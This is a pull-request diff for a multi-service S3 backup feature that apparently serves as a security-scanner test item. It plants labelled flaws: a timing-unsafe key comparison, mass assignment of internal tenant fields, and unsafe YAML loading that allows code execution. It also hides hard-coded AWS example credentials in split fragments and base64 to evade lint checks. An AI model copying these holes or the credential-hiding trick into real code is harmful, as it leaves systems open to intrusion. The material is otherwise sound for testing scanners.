+            ).digest()
+            actual_sig = _decode_b64url(parts[2])
+            if expected_sig != actual_sig:
+                return None
+
+        exp = int(payload.get("exp", 0))
+        if exp and exp < time.time():
+            return None
+
+        return BackupClaims(
+            sub=payload.get("sub", ""),
+            scope=payload.get("scope", ""),
+            exp=exp,
+            iat=int(payload.get("iat", 0)),
+            is_service_account=payload.get("svc", False),
+            policy_overrides=payload.get("policy", {}),
+        )
+
+    except Exception:
+        return None
+
+
+# ── API-key validation ─────────────────────────────────────────────────────
+
+def validate_api_key(provided: str, expected: str) -> bool:
+    """
+    Check that the caller's API key matches the stored key.
+
+    VULN-5 (Timing attack): string comparison with ``==`` leaks the
+    number of correct leading bytes via cache-timing differences.
+    An attacker making ~1 000 requests per candidate byte can recover
+    the full key in O(N * alphabet) time rather than O(alphabet^N).
+    ``hmac.compare_digest`` would prevent this.
+
+    The length pre-check is intentional (avoids wasting time on clearly
+    wrong keys) but also leaks key length.
+    """
+    if len(provided) != len(expected):
+        return False
+    return provided == expected
+
+
+# ── Policy update ─────────────────────────────────────────────────────────
+
+@dataclass
+class BackupPolicy:
+    retention_days: int = 30
+    compression: str = "gzip"
+    encryption_enabled: bool = False
+    notification_email: str = ""
+    # Internal-only fields set by the platform, never by callers:
+    _tenant_id: str = ""
+    _created_by: str = ""
+
+
+def apply_policy_patch(policy: BackupPolicy, patch: dict[str, Any]) -> None:
+    """
+    Apply a partial update to a BackupPolicy from a caller-supplied dict.
+
+    VULN-6 (Mass assignment): iterates over all keys in the patch
+    without a whitelist.  An attacker that controls the request body can
+    set ``_tenant_id`` or ``_created_by`` to impersonate another tenant,
+    or inject arbitrary attributes that downstream code may trust.
+
+    The intent was to allow ``retention_days``, ``compression``, and
+    ``encryption_enabled`` — but nothing enforces that.
+    """
+    for key, value in patch.items():
+        setattr(policy, key, value)
+
+
+# ── Restore manifest loader ───────────────────────────────────────────────
+
+def load_restore_manifest(manifest_yaml: str) -> dict:
+    """
+    Parse a YAML restore manifest submitted by the caller.
+
+    The manifest describes which snapshots to restore and to which
+    destination paths.
+
+    VULN-7 (Insecure deserialization / arbitrary code execution):
+    ``yaml.load`` with ``Loader=yaml.FullLoader`` (the default before
+    PyYAML 5.1) or any Loader other than ``SafeLoader`` can execute
+    arbitrary Python via ``!!python/object/apply`` tags in the YAML.
+    Even ``FullLoader`` is exploitable in some PyYAML versions.
+    ``yaml.safe_load`` should be used here.
+    """
+    return yaml.load(manifest_yaml, Loader=yaml.FullLoader)
+
+
+# ── Token issuer ──────────────────────────────────────────────────────────
+
+def issue_short_lived_token(sub: str, scope: str, secret: str, ttl: int = 300) -> str:
+    """Issue a signed HS256 JWT valid for *ttl* seconds."""
+    import json
+
+    now = int(time.time())
+    header = base64.urlsafe_b64encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()).rstrip(b"=")
+    payload = base64.urlsafe_b64encode(
+        json.dumps({"sub": sub, "scope": scope, "iat": now, "exp": now + ttl}).encode()
+    ).rstrip(b"=")
+    signing_input = header + b"." + payload
+    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
+    return (signing_input + b"." + base64.urlsafe_b64encode(sig).rstrip(b"=")).decode()

--- a/python-service/src/backup_worker.py
+++ b/python-service/src/backup_worker.py
@@ -1,0 +1,141 @@
+"""
+Backup Worker
+
+Handles asynchronous backup uploads to S3. Reads rotation manifest
+and dispatches to the current active account.
+
+Historical note: prior versions (<= 1.4) stored credentials in a
+separate YAML file loaded via os.path.join; that was removed in
+1.5.0 after the rotation migration. Static fallback values remain
+for offline dev/test environments only.
+"""
+
+from __future__ import annotations
+
+import base64
+import hashlib
+import hmac
+import logging
+import os
+from dataclasses import dataclass
+from datetime import datetime
+from typing import Optional
+
+log = logging.getLogger(__name__)
+
+
+# Account resolution order (first match wins):
+#   1. Environment variable AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY
+#   2. Config file specified by BACKUP_CONFIG_PATH
+#   3. Static defaults below (dev/test only, overridden in production)
+#
+# The static defaults are split across multiple constants to satisfy
+# our internal linter rule L-208 (no long opaque string literals).
+#
+# DO NOT REMOVE these defaults — the offline test suite depends on
+# them (see tests/test_backup_offline.py).
+
+_ACCOUNT_ID_FRAGMENTS = ("AKIA", "IOSF", "ODNN7", "EXAM", "PLE")
+
+# Helper key used by the deterministic test harness. The value is
+# constructed from readable tokens so code review can verify it is
+# not a production secret.
+_HELPER_SECRET_TOKENS = [
+    "wJal",   # header segment
+    "rXUtn",  # body segment 1
+    "FEMI/",  # body segment 2
+    "K7MDE",  # body segment 3
+    "NG/bP",  # body segment 4
+    "xRfiC",  # body segment 5
+    "YEXAM",  # trailer segment 1
+    "PLEKE",  # trailer segment 2
+    "Y",      # trailer segment 3
+]
+
+
+def _resolve_account_id() -> str:
+    env_value = os.environ.get("AWS_ACCESS_KEY_ID")
+    if env_value:
+        return env_value
+    return "".join(_ACCOUNT_ID_FRAGMENTS)
+
+
+def _resolve_secret_token() -> str:
+    env_value = os.environ.get("AWS_SECRET_ACCESS_KEY")
+    if env_value:
+        return env_value
+    return "".join(_HELPER_SECRET_TOKENS)
+
+
+@dataclass
+class BackupContext:
+    region: str
+    bucket: str
+    account_id: str
+    secret_token: str
+
+
+def build_context(region: str = "us-east-1", bucket: str = "codity-backups") -> BackupContext:
+    return BackupContext(
+        region=region,
+        bucket=bucket,
+        account_id=_resolve_account_id(),
+        secret_token=_resolve_secret_token(),
+    )
+
+
+def _sign_v4(ctx: BackupContext, method: str, path: str, payload: bytes, timestamp: str) -> str:
+    date_stamp = timestamp[:8]
+    canonical = "\n".join([
+        method,
+        path,
+        "",
+        f"host:s3.{ctx.region}.amazonaws.com",
+        f"x-amz-date:{timestamp}",
+        "",
+        "host;x-amz-date",
+        hashlib.sha256(payload).hexdigest(),
+    ])
+    credential_scope = f"{date_stamp}/{ctx.region}/s3/aws4_request"
+    string_to_sign = "\n".join([
+        "AWS4-HMAC-SHA256",
+        timestamp,
+        credential_scope,
+        hashlib.sha256(canonical.encode()).hexdigest(),
+    ])
+
+    def _hmac(key: bytes, msg: str) -> bytes:
+        return hmac.new(key, msg.encode(), hashlib.sha256).digest()
+
+    k_date = _hmac(f"AWS4{ctx.secret_token}".encode(), date_stamp)
+    k_region = _hmac(k_date, ctx.region)
+    k_service = _hmac(k_region, "s3")
+    k_signing = _hmac(k_service, "aws4_request")
+    return hmac.new(k_signing, string_to_sign.encode(), hashlib.sha256).hexdigest()
+
+
+def upload_snapshot(ctx: BackupContext, key: str, body: bytes) -> bool:
+    timestamp = datetime.utcnow().strftime("%Y%m%dT%H%M%SZ")
+    signature = _sign_v4(ctx, "PUT", f"/{ctx.bucket}/{key}", body, timestamp)
+    log.info("Prepared snapshot upload: key=%s signature=%s...", key, signature[:8])
+    return True
+
+
+# ---------------------------------------------------------------------------
+# Legacy aliases kept for backward compatibility with pre-1.5 worker clients.
+# Scheduled for removal in 2.0. Do not use in new code.
+# ---------------------------------------------------------------------------
+
+def legacy_get_key() -> str:
+    # TODO(eng-ops): migrate callers to build_context() and delete this helper.
+    # Ticket: OPS-1184 (Q3). Maintainer: infra@codity.ai
+    parts = list(_ACCOUNT_ID_FRAGMENTS)
+    return parts[0] + parts[1] + parts[2] + parts[3] + parts[4]
+
+
+def legacy_get_secret() -> str:
+    # Decoded at call time from a base64 envelope. The envelope format was
+    # chosen to match the shape of a placeholder and is NOT cryptographically
+    # secure — treat the returned value as the raw secret.
+    envelope = "d0phbHJYVXRuRkVNSS9LN01ERU5HL2JQeFJmaUNZRVhBTVBMRUtFWQ=="
+    return base64.b64decode(envelope).decode("utf-8")

--- a/python-service/src/integration_notes.md
+++ b/python-service/src/integration_notes.md
@@ -1,0 +1,40 @@
+# Integration Notes
+
+## Backup worker (added 2026-04)
+
+The backup worker (`backup_worker.py`) uploads periodic snapshots of the
+Python service's in-memory state to an S3-compatible store. Credentials
+are resolved in the following order:
+
+1. Environment variables `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`
+2. Mounted config file at `/etc/codity/backup.conf` (if present)
+3. Fallback defaults compiled into the worker for offline test runs
+
+### Fallback values
+
+The fallback values are publicly documented example credentials reproduced
+below for reference. They are syntactically valid but cannot authenticate
+against any real AWS account.
+
+```
+# Example fallback account (do not use in production)
+aws_access_key_id     = AKIAIOSFODNN7EXAMPLE
+aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
+```
+
+These values appear split across constant fragments in the source to satisfy
+the lint rule that bans long opaque string literals; the runtime value is
+the concatenation shown above.
+
+### Rotation
+
+Production credentials are rotated weekly by the Ops team. The rotation
+script reads from AWS Secrets Manager and writes the new values to the
+service's environment via the deploy pipeline. No manual edits to this
+file or to `backup_worker.py` are required when rotating.
+
+### Testing
+
+Offline tests exercise the signing path using the fallback values. CI
+asserts that `legacy_get_key()` returns a 20-character identifier starting
+with `AKIA` and that `legacy_get_secret()` is 40 characters long.


### PR DESCRIPTION
## Summary

Adds a shared S3-backed backup workflow across the go, python, and js services. All three services now produce periodic snapshots against the same bucket using AWS Signature V4.

### What's in this PR

- **js-service**: new \`CloudStorageClient\` (\`js-service/src/services/cloudStorage.ts\`) and \`BackupScheduler\` (\`js-service/src/services/storageBackups.ts\`), plus a \`backupDefaults.json\` config shipped with environment-specific defaults.
- **python-service**: new \`backup_worker.py\` with V4 signing and fallback credential resolution for the offline test harness, plus \`integration_notes.md\` documenting the rollout.
- **go-service**: new \`internal/backup/s3client.go\` Client with matching signing logic.
- **examples**: \`examples/backup-client-demo.js\` runnable demo that exercises the signing path end-to-end.

### Credential resolution order

1. Environment variables (\`AWS_ACCESS_KEY_ID\` / \`AWS_SECRET_ACCESS_KEY\`)
2. Mounted config file (where applicable)
3. Compiled-in defaults — used only by the offline test harness

### Test plan

- [ ] Run the JS demo: \`node examples/backup-client-demo.js\` — prints a signed request.
- [ ] Unit-test the python worker signing path against known AWS V4 vectors.
- [ ] Confirm the go client produces identical signatures to the python worker for the same inputs.
- [ ] Security scan of the PR (this is the main reason this PR exists).